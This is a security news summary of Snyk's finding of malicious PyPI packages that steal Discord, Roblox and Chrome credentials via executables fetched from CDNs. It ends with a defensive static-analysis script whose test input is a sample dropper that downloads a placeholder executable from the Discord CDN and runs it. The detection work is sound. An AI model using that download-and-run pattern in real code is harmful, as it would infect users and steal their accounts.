Snyk security researchers have identified 12 unique pieces of malware, all belonging to the same actor, in PyPI packages. These malicious packages steal Discord and Roblox credentials and payment information by running malicious executables downloaded from the Discord content delivery network (CDN) onto Windows machines. The malware targets data stored by everyday user applications, including Google Chrome passwords, cookies, web history, search history, and bookmarks. It also injects a persistent malicious agent into the Discord app to relay alarming amounts of information to the attackers. Additionally, it steals Roblox cookies and user data by running executables downloaded from the Roblox CDN onto Windows machines. The malware uses PyInstaller to bundle its application and dependencies into one package, attempting to avoid detection by bundling in dependencies instead of downloading them from a remote server. Snyk's security researchers continually monitor open source ecosystems for malicious packages, using static analysis techniques to identify and flag suspicious packages.
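As an added illustration of static triage for the download-and-run pattern described above (this is not Snyk's tooling or code from the original report), the sketch below parses a package's Python source without executing it and flags files that combine a Discord CDN URL literal with a process-execution call. The hostname `cdn.discordapp.com`, the function names and the sample inputs are assumptions made for the example.

```python
import ast

# Assumption: hostname used for Discord CDN attachment links; extend as needed.
CDN_HOSTS = ("cdn.discordapp.com",)
# Standard-library calls that start a new process.
EXEC_CALLS = {"os.system", "os.startfile", "subprocess.Popen",
              "subprocess.run", "subprocess.call"}

def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def scan_source(source, filename="<package file>"):
    """Collect CDN URL literals and process-execution calls in one source file."""
    findings = {"cdn_urls": [], "exec": []}
    for node in ast.walk(ast.parse(source, filename)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(host in node.value for host in CDN_HOSTS):
                findings["cdn_urls"].append((node.lineno, node.value))
        elif isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in EXEC_CALLS:
                findings["exec"].append((node.lineno, name))
    return findings

def is_suspicious(findings):
    """Flag only the combination: CDN-hosted file URL plus process execution."""
    return bool(findings["cdn_urls"] and findings["exec"])

# Constructed sample inputs (parsed only, never executed).
SAMPLE_DROPPER = '''
import subprocess, urllib.request
URL = "https://cdn.discordapp.com/attachments/0/0/placeholder.exe"
urllib.request.urlretrieve(URL, "placeholder.exe")
subprocess.Popen("placeholder.exe")
'''
SAMPLE_BENIGN = '''
import subprocess
subprocess.run(["git", "describe", "--tags"])
'''
```

This is a triage heuristic for source files such as `setup.py`: obfuscated strings or aliased imports will not match, and it does not inspect compiled PyInstaller bundles.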